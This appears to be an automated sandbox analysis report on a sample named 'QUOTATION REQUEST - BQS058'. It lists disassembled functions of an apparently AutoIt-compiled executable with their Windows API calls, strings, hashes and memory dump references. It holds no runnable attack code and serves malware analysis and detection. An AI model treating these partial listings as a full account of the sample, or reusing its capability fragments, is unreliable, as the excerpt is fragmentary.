Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
Instruction ID: 79734d28f541dfb41e2add011ff96ecc38e89ede59d0367f80fc1d5ca70be953
Opcode Fuzzy Hash: 23a450dd9a02eaaeb38cce6d7046e64b37f8dca615845dfd22f5616634c5e7e8
Instruction Fuzzy Hash: B361BC71900219BAEB94DF68CC45BBF7BA9FB08710F10414AFD95D61C1DB79AA80DBA0

Function 0103A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

CharLowerBuffW.USER32(?,?), ref: 0103A3CB
GetDriveTypeW.KERNEL32 ref: 0103A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103A4C5

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

Strings

set cd door , xrefs: 0103A466
open , xrefs: 0103A427
close cd wait, xrefs: 0103A4B0
closed, xrefs: 0103A3DF, 0103A3E8
open, xrefs: 0103A3F2
type cdaudio alias cd wait, xrefs: 0103A443
close, xrefs: 0103A3D1
wait, xrefs: 0103A482

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: beb679f63bc78b2be26e9801a356449345c482d919209a5166f20fc6c5f83ee7
Instruction ID: 07e0f6905b8aec2ffd0648e2596d41b715c7999856eeccdefdce59934b135892
Opcode Fuzzy Hash: beb679f63bc78b2be26e9801a356449345c482d919209a5166f20fc6c5f83ee7
Instruction Fuzzy Hash: C65139712083059FC700EF25C99186AB7E9EF88718F44885EF8D69B262DB35ED09DB52

Function 0102F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0102F8DF
LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F8E8

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

GetModuleHandleW.KERNEL32(00000000,01095310,?,00000FFF,?,?,0100E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0102F90A
LoadStringW.USER32(00000000,?,0100E029,00000001), ref: 0102F90D
__swprintf.LIBCMT ref: 0102F95D
__swprintf.LIBCMT ref: 0102F96E
_wprintf.LIBCMT ref: 0102FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0102FA2E

Strings

Error: , xrefs: 0102F9E5
%s (%d) : ==> %s: %s %s, xrefs: 0102FA12
^ ERROR, xrefs: 0102F9C3
Line %d:, xrefs: 0102F968
Line %d (File "%s"):, xrefs: 0102F957

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 7809e6d2eaa738b90bb7190d740d87cd200428585d2f8da74293c0331476a5a5
Instruction ID: 5614410358a3894b1f6f95976345a79bc191bbaea077111674967749910e53d8
Opcode Fuzzy Hash: 7809e6d2eaa738b90bb7190d740d87cd200428585d2f8da74293c0331476a5a5
Instruction Fuzzy Hash: E5419F7280421EAACF04FFE0DD86DEEB779AF14340F540056F645BA191EA396F09DB61

Function 0105BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01059207,?,?), ref: 0105BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA85
GlobalLock.KERNEL32(00000000), ref: 0105BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0105BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01059207,?,?,00000000,?), ref: 0105BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,01062CAC,?), ref: 0105BAD7
GlobalFree.KERNEL32(00000000), ref: 0105BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0105BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0105BB36
DeleteObject.GDI32(00000000), ref: 0105BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0105BB74

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
Instruction ID: ecdfa28aaf714a105a8de844fa02dc7b39b8b8785258f077581693e91e3465f9
Opcode Fuzzy Hash: e51108ac123b12b8a8ce4ecc63c623ec59aff2b1f893d084768f2ea9550c3cb1
Instruction Fuzzy Hash: 00416775600309AFDB619F69DC88EABBBF9FF89711F104058F989D7254C779AA01CB20

Function 0103D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0103DA10
_wcscat.LIBCMT ref: 0103DA28
_wcscat.LIBCMT ref: 0103DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0103DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0103DA63
GetFileAttributesW.KERNEL32(?), ref: 0103DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0103DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0103DAA7

Strings

*.*, xrefs: 0103DAE6

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
Instruction ID: 868efb789e188a6b670377d6e9481490799b7163b50b40f19a07d11a83e7b751
Opcode Fuzzy Hash: d6c987923a5b1657b91cc7c0251398ae427aca553ae3a89110bea46591c1afe4
Instruction Fuzzy Hash: 2981AF715082419FCB64EFA8C8409AEB7E9AFC9310F88486EF9C9C7211E734D945CB52

Function 0105C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0105C1FC
GetFocus.USER32 ref: 0105C20C
GetDlgCtrlID.USER32(00000000), ref: 0105C217
_memset.LIBCMT ref: 0105C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0105C36D
GetMenuItemCount.USER32(?), ref: 0105C38D
GetMenuItemID.USER32(?,00000000), ref: 0105C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0105C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0105C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0105C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0105C489

Strings

0, xrefs: 0105C33A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 52b7108bd5ee10b736324b20be2c8b1b5fa03435761a6daac0dbf86ef350ddab
Instruction ID: eb47b37130210c1fb59ea71c59fa0cd5cf585056a630537ef58f3f30d2db82c4
Opcode Fuzzy Hash: 52b7108bd5ee10b736324b20be2c8b1b5fa03435761a6daac0dbf86ef350ddab
Instruction Fuzzy Hash: CC819E701083059FE7A1CF18C984A6BBBE8FB88754F00496EFED597292CB75D904CB62

Function 0104731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0104738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0104739B
CreateCompatibleDC.GDI32(?), ref: 010473A7
SelectObject.GDI32(00000000,?), ref: 010473B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01047408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01047444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01047468
SelectObject.GDI32(00000006,?), ref: 01047470
DeleteObject.GDI32(?), ref: 01047479
DeleteDC.GDI32(00000006), ref: 01047480
ReleaseDC.USER32(00000000,?), ref: 0104748B

Strings

(, xrefs: 01047410

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7f69050459ca9f67cf0e698ccfe902e74e1711a30e54f369350d605442a7c344
Instruction ID: 7fe0270d2854fd6ae1e533ae3598458725ba839ab098096f4c4c05615c31962a
Opcode Fuzzy Hash: 7f69050459ca9f67cf0e698ccfe902e74e1711a30e54f369350d605442a7c344
Instruction Fuzzy Hash: 7D512BB5900309EFDB25CFA8C885EAFBBB9EF48310F14852DFA9997210D775A940CB50

Function 00FD6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00FF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FD6B0C,?,00008000), ref: 00FF0973

Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FD6BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00FD6CFA

Part of subcall function 00FD586D: _wcscpy.LIBCMT ref: 00FD58A5

Part of subcall function 00FF363D: _iswctype.LIBCMT ref: 00FF3645

Strings

Unterminated string, xrefs: 0100E7E4
Error opening the file, xrefs: 0100E43D, 0100E4B8
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0100E421
AU3!, xrefs: 00FD6B61
Bad directive syntax error, xrefs: 0100E79D
>>>AUTOIT SCRIPT<<<, xrefs: 0100E496
EA06, xrefs: 0100E452

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: afb4d95aaac6bf4d9ed28b06a38431f40255aee004bbe35e3e567dd9b3c46c8c
Instruction ID: 025c9271be693580065534449d74cf60228b8b751e85be8234562d30c6718b5c
Opcode Fuzzy Hash: afb4d95aaac6bf4d9ed28b06a38431f40255aee004bbe35e3e567dd9b3c46c8c
Instruction Fuzzy Hash: 4902BB311083419FD725EF24C880AAFBBE6BF98314F08481EF5C9972A2DB34D949DB52

Function 01032D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 01032DDD
GetMenuItemCount.USER32(01095890), ref: 01032E66
DeleteMenu.USER32(01095890,00000005,00000000,000000F5,?,?), ref: 01032EF6
DeleteMenu.USER32(01095890,00000004,00000000), ref: 01032EFE
DeleteMenu.USER32(01095890,00000006,00000000), ref: 01032F06
DeleteMenu.USER32(01095890,00000003,00000000), ref: 01032F0E
GetMenuItemCount.USER32(01095890), ref: 01032F16
SetMenuItemInfoW.USER32(01095890,00000004,00000000,00000030), ref: 01032F4C
GetCursorPos.USER32(?), ref: 01032F56
SetForegroundWindow.USER32(00000000), ref: 01032F5F
TrackPopupMenuEx.USER32(01095890,00000000,?,00000000,00000000,00000000), ref: 01032F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01032F7E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
Instruction ID: 6d803edb5ea2c453afc63297c110e15d79a075f0615e5ecb57c65bdd5d3f6848
Opcode Fuzzy Hash: 6a1d9cc2f5bdd9f84cd04b80864faa56419f278eb6d621cde65a33febafaa019
Instruction Fuzzy Hash: 4871C570600206BEFB219F58DC49FAABFACFF84754F144256F7A5AA1D0C7756820CBA0

Function 010277DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

_memset.LIBCMT ref: 0102786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010278A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010278BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010278D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01027902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0102792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01027935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0102793A

Strings

\CLSID, xrefs: 01027822
SOFTWARE\Classes\, xrefs: 0102780C
\IPC$, xrefs: 01027882

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
Instruction ID: 1210fdde078dda5925af774e967a90ad4d8c935ca280c63fd76eec79f119e3b0
Opcode Fuzzy Hash: 65c37711702cce5ef6b86dab53f0f11b000d7be3ca14969f6152d200a3444dff
Instruction Fuzzy Hash: 81412872C10229AACF21EBA4DC85DEEB7B9FF14710F44406AF945A7261EB399904DB90

Function 01050E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31

Strings

HKU, xrefs: 01050F43
HKEY_CLASSES_ROOT, xrefs: 01050EC4
HKCU, xrefs: 01050F21
HKCC, xrefs: 01050EFF
HKEY_CURRENT_USER, xrefs: 01050F10
HKCR, xrefs: 01050ED9
HKEY_LOCAL_MACHINE, xrefs: 01050E9A
HKEY_USERS, xrefs: 01050F32
HKLM, xrefs: 01050EAF
HKEY_CURRENT_CONFIG, xrefs: 01050EEE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
Instruction ID: 7aafd6793aaf7d0b4e70ae08f83670f75a3d1dd402ff48e68a7fa94e3d7fcf90
Opcode Fuzzy Hash: d61bc5655e110c49e2555c756a00053cb6d526954fc1a2fa17a7c16bf2c866c8
Instruction Fuzzy Hash: 4C41573110424A8BCF81FE18DD61AFF37A0BF41304F144445FCD51B6AADB399919DBA0

Function 0102F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0100E2A0,00000010,?,Bad directive syntax error,0105F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0102F7C2
LoadStringW.USER32(00000000,?,0100E2A0,00000010), ref: 0102F7C9

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

_wprintf.LIBCMT ref: 0102F7FC
__swprintf.LIBCMT ref: 0102F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0102F88D

Strings

., xrefs: 0102F873
%s (%d) : ==> %s.: %s %s, xrefs: 0102F7F7
Line %d:, xrefs: 0102F818
Error: , xrefs: 0102F85B
Line %d (File "%s"):, xrefs: 0102F833

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 0fb60837235547183b8393970277d6b823a03d8a6f6fcc5df0c796be7a9adf9e
Instruction ID: 22f3fb48bbb1a6fbeff84e89e9242f7f884703432c658d0f3686fc2047044c23
Opcode Fuzzy Hash: 0fb60837235547183b8393970277d6b823a03d8a6f6fcc5df0c796be7a9adf9e
Instruction Fuzzy Hash: AA21713190421EAFCF11FF90CC0AEFE7779BF18300F04445AF5456A161EA7A9618EB51

Function 010352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

Part of subcall function 00FD7924: _memmove.LIBCMT ref: 00FD79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 01035330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01035346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01035357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01035369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0103537A

Strings

open , xrefs: 010352DF
play PlayMe wait, xrefs: 01035364
close PlayMe, xrefs: 01035341, 0103536E
play PlayMe, xrefs: 01035375
status PlayMe mode, xrefs: 0103532B
alias PlayMe, xrefs: 01035309

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
Instruction ID: dacbe4d19e2c8f5880f464fab00a709846778a49ae8cec7dbbff321399b2c5fd
Opcode Fuzzy Hash: 14c175e53c57600c201bf8ea94522954e4f52ea240ea4f67689d3dcb846db0f3
Instruction Fuzzy Hash: 42110471A9422979D760B676CC4ADFF7BBCFFD5B00F84445BB481AA1A1EAA04804C5A0

Function 010346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 010346D2
gethostname.WSOCK32(?,00000100), ref: 010346EC
gethostbyname.WSOCK32(?), ref: 010346F9
_wcscpy.LIBCMT ref: 01034721
_memmove.LIBCMT ref: 01034734
inet_ntoa.WSOCK32(?), ref: 0103473F
_strcat.LIBCMT ref: 0103474D
_wcscpy.LIBCMT ref: 01034764
WSACleanup.WSOCK32 ref: 01034772
_wcscpy.LIBCMT ref: 01034780

Strings

0.0.0.0, xrefs: 0103471B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
